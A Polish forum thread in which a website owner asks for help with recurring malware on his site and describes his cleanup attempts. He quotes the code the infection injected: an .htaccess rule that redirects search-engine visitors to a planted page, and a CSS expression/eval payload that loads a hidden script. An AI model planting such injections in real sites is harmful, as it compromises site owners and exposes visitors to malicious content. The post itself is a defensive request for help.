Mam wirusa na WWW, jak się go pozbyć, Jakiś malware-gen, proszę o pomoc Opcje

[Tomplus]

Witam,

Prowadzę stronę www.swos.pl
Ostatnio walczę z wirusem malware-gen, o którym informuje AVAST i to nie jest problem który wyjasnianiają w tym wątku http://prvforum.prv.pl/viewtopic.php?t=15553

tutaj jest fota z antywirusa
(IMG:http://img168.imageshack.us/img168/3766/beztytuuki1.jpg)

Oczywiscie mój anti nie wykrywa go, jednakze to nie znaczy ze go nie ma.

Wirus jest specyficzny bo bez naruszenia daty dodaje kod:

do plików .htaccess, do wszystkich jakie znajduje na I i II poziomie roota

CODE

# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail
gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_wo
d|buscar|text|words|su|q t|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_wo
d|buscar|text|words|su|q t|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /swospl/gfx/arutab/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

oraz analogicznie tylko do plików arkusza stylów CSS kod

CODE

/*0b4df006e02184c60dbf503e71c87ad */
body {
margin-top: expression(eval(unescape('if (!document.getElementById('JSSS')){
JSS1 = 59; JSS2 = 157763;
JSS3 = '/swospl/gfx/arutab/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/swospl/gfx/arutab/check.js');
js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
'))) }
/* a995d2cc661fa72452472e9554b5520c */

to powyższe jest z dekodowane, bo inaczej człowiek by nic nie odczytał.
Po nitce do kłębka znalazłem nie proszony katalog ARUTAB i usunąłem.


W tym roku poraz 3 pojawia się ten katalog i nie wiadomo dlaczego zmienia style css i .htaccess
strona ogólnie nie zmienia się nic, a nic wszystko działa jak należy, ale .... nie podoba mi się taki nie proszony gosć i skąd się wziął.

Dostęp do konta mają tylko 2 osoby. Po poprzedniej takim incydencie skasowałem pliki js i sprawdziłem wszystkie pliki
kasując w css i ht szkoliwy kod i skontrolowałem pliki js i php na całym serwerze.
Nic nie znalazłem.
Jednakże dzisiaj pojawił się ponowanie i znowu musiałem sprzątać.

Będę wdzięczny za rozwiązanie.

- prawdopodobne rozwiązanie jest w http://forums.devshed.com/apache-developme...y-512348-2.html
jednakże zupełnie nie rozumie dyskusji, w większości przekracza moje kompetencje językowe.

[Tomplus]

Nie mam dostępu do logów, bo konto jest na zewnętrznym serwerze, ale nie free.

Wlasnie pliki znowu się pojawiły, w tym samym katalogu i tym samym dodał się do css i htaccess nie proszony kod.

Kody usunąłem, a katalog w którym się pojawia zablokowałem ustawiajac chmod 000.
Prawdopodobnie stary kod strony, który kilka lat temu stworzył drugi właściciel konta, ma dziurę którą mi przedstawiłeś.

Zmieniłem hasło, teraz i wcześniej.
Jednak przypuszczam to pierwsze, bo gdyby cracker miał dostęp do FTP to umieściłby jakieś nie ciekawe pliki/zdjęcia, które zaczęłyby mi obciążać transfer.
A na tą chwilę dysk zwiększał się tylko o kilkanaście kilob co było spowodowane przez mnogość plików css i .htaccess na serwerze.

Co ciekawe pliki zostały zmieniane tylko w publicznych katalogach, a tych "nie publicznych" - smieciarkach - gdzie równiez sa te pliki - nic nie zostało zmieniane.